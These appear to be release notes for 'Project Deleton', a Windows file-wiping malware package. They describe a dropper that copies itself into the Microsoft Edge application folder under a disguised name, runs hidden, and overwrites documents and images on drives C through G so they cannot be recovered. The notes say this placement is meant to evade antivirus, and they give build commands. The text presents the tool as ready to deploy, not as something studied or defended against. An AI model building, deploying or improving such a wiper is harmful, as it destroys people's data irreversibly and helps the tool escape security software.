Project Deleton v1.1.1
This release introduces a single EXE dropper that installs and launches the background file-wipe watcher as delpod.exe under the Edge application folder, plus the unchanged Safe Test utility.
📂 Contents
projectdeleton_c/
├── Test (Safe)/
│ ├── exe/
│ │ └── safe.exe
│ ├── safe.c
│ ├── safevc.c
│ ├── safev2.c
│ └── info.txt
└── delete/
├── exe/
│ └── delete.exe
├── delete.c
└── No Safe.txt
🚀 New “Delete Dropper” Feature
-
Single EXE (
delete.exe)- When you run
delete.exe, it copies itself into
C:\Program Files (x86)\Microsoft\Edge\Application\delpod.exe. - It then launches
delpod.exehidden (no console window).
- When you run
-
Background Watcher (
delpod.exe)-
Monitors drives:
C:,D:,E:,F:,G:in real time. -
Recursively overwrites any new or modified file with one of the target extensions
(.txt, .docx, .xlsx, .pdf, .jpg, .jpeg, .png, .bmp)
with the warning message:“Wooh Delete delete delete........”
-
Runs silently as a background process—no UI, no console.
-
🔐 Safe Test Utility
-
safe.exe(inTest (Safe)/exe) remains unchanged. -
Overwrites only files in its own folder (no recursion) with:
“You are a thief. This device has been locked down.”
-
Ideal for verifying behavior in a controlled environment.
⚠️ Important
- Both tools permanently overwrite file contents—no recovery without external backups.
- Always test with Safe Test first before deploying the dropper.
- This dropper approach avoids antivirus delays and false positives by leveraging a trusted folder location.
🛠️ Build Instructions
# Safe Test
gcc safe.c -mwindows -o safe.exe
# Delete Dropper (single EXE)
gcc delete.c -mwindows -lshlwapi -o delete.exe